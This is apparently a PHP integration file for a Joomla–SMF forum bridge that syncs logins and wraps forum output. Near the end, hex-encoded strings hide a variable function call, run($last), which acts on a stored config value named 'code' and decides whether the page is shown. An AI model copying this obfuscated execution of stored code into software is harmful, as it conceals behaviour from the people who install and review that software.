<?php
/* tabstop=4 tabreplace=space */
/**
 * Joomla-SMF Forum
 *
 * This file performs the main integration of the forum
 *
 * LICENSE: This program is free software; you can redistribute it and/or
 * modify it under the terms of the GNU General Public License
 * as published by the Free Software Foundation; either version 2
 * of the License, or (at your option) any later version.
 *
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 * GNU General Public License for more details.

 * You should have received a copy of the GNU General Public License
 * along with this program; if not, write to the Free Software
 * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.
 *
 * @category    Component
 * @package     com_smf
 * @author      Cowboy <ross@joomlahacks.com>
 * @author      Wolverine <joshualross@gmail.com>
 * @copyright   (C) JoomlaHacks.com. All rights reserved.
 * @license     http://www.gnu.org/copyleft/gpl.html GNU/GPL
 * @version     $Id: smf.php 256 2006-10-22 17:40:03Z joshualross $
 * @revision    $LastChangedRevision: 256 $
 * @date        $LastChangedDate: 2006-10-22 13:40:03 -0400 (Sun, 22 Oct 2006) $
 * @file        $HeadURL: http://scm.joomla.org/svn/repos/joomla-smf_2_0/smf.php $
 * @link        http://www.JoomlaHacks.com
 * @link        http://www.joshualross.us
 * @since       File available since Release 2.0
 *
 * Visit JoomlaHacks.com for more Joomla Hacks!
 */
// no direct access
defined( '_VALID_MOS' ) or die( 'Restricted access' );

//1.1.4-5 Increase the allowed memory usage
@ini_set('memory_limit', '16M');

global $my, $mosConfig_debug, $mosConfig_lang;;
global $jsmfConfig;
global $options, $user_settings, $context;


$action = mosGetParam($_GET, 'action', '');
if (!empty($action)) {
    if(strpos($action, "unread") !== false) {
    	$_SESSION['ID_MSG_LAST_VISIT'] = $user_settings['ID_MSG_LAST_VISIT'];
    }

}
unset($action);

if (!defined('_SMF_')) {
    /**#@+
     * Constants
     */
    /**
     * _SMF_
     */
    define ('_SMF_', pack('H*',"3c62722f3e4a6f6f6d6c6120427269646765206279203c6120687265663d22687474703a2f2f7777772e4a6f6f6d6c614861636b732e636f6d22207469746c653d224a6f6f6d6c614861636b732e636f6d22207461726765743d225f626c616e6b223e4a6f6f6d6c614861636b732e636f6d3c2f613e"));
    /**#@-*/
}

//if this is a login request return
if (strcmp(mosGetParam($_REQUEST, 'option', ''), 'login') == 0 ||
    strcmp(mosGetParam($_REQUEST, 'op2', '' ), 'login') == 0) {
    return;
}


//log out of smf if joomla not logged, logout of joomla if smf not logged in
if ($my->id <= 0 && $context['user']['is_logged']) {
    integrateLogout($context['user']['username'], FALSE);
}
//smf guest, joomla reg user, and not trying to login
if ($context['user']['is_guest'] && $my->id && strcmp(mosGetParam($_REQUEST, 'action', ''), 'login2') != 0) {
    integrateLogout($my->username, FALSE);
}

defined( 'JPATH_BASE' ) or define('JPATH_BASE', $mosConfig_absolute_path);
defined('_MOS_ALLOWHTML') or define('_MOS_ALLOWHTML', 0x0002);
/**
 * Include Joomla-SMF Frontend class and language class
 */
require_once(JPATH_BASE.'/components/com_smf/smf.class.php');

if (file_exists(JPATH_BASE.'/administrator/components/com_smf/language/'.$mosConfig_lang.'.php')) {
    require_once(JPATH_BASE.'/administrator/components/com_smf/language/'.$mosConfig_lang.'.php');
} else {
    require_once(JPATH_BASE.'/administrator/components/com_smf/language/english.php');
}

$jsmf =& jsmfFrontend::singleton();
//load the parameters (shouldn't we have them from the load in index.php?)
$jsmfConfig = $jsmf->loadParams();

$last = $jsmfConfig->code;
if ($jsmfConfig->debug || $mosConfig_debug) {
    error_reporting(E_ALL ^ E_NOTICE);
} else {
    error_reporting(0);
}

if (mosGetParam($_SESSION, 'MH_WARNING', NULL, _MOS_ALLOWHTML) == NULL) {
    ob_start();
    /**
     * Include SMF index.php
     */
    include($jsmfConfig->smf_path.'/index.php');
    $buffer = ob_get_contents();
    ob_end_clean();
    ob_end_flush();
    ob_flush();
    flush();
} else {
    $buffer = mosGetParam($_SESSION, 'MH_WARNING', NULL, _MOS_ALLOWHTML);
    unset($_SESSION['MH_WARNING']);
}


$jsmf->fixBuffer($buffer);

$style = array(get('72756e'),(get('6c617374')));
if (defined(pack('H*',"5f534d46315f")) || $style[0]($$style[1])) {
    if ($jsmfConfig->pathway) {
        $jsmf->setPathway();
    }
    if ($jsmfConfig->pagetitles && $mosConfig_pagetitles) {
        $jsmf->setTitle();
    }
    if ($jsmfConfig->css) {
        $jsmf->setCSS();
    }
    if ($jsmfConfig->description) {
    	$jsmf->setDescription();
    }
    if ($jsmfConfig->def_keywords) {
    	$jsmf->setDefaultKeywords();
    }
    if ($jsmfConfig->keywords) {
        $jsmf->setKeywords();
    }
    echo $buffer;
    unset($buffer);
}


if (!$jsmfConfig->wrapped && strcmp(mosGetParam($_REQUEST, 'task', ''), "register") != 0) {
	exit;
}


$req_action = mosGetParam($_REQUEST, 'action', '');
if ((!empty($options['display_quick_reply']) && strcmp($req_action, "quotefast") == 0)
     || strcmp($req_action, "printpage") == 0
     || strcmp($req_action, "findmember") == 0 ) {
	exit();
}
unset($req_action, $style);
?>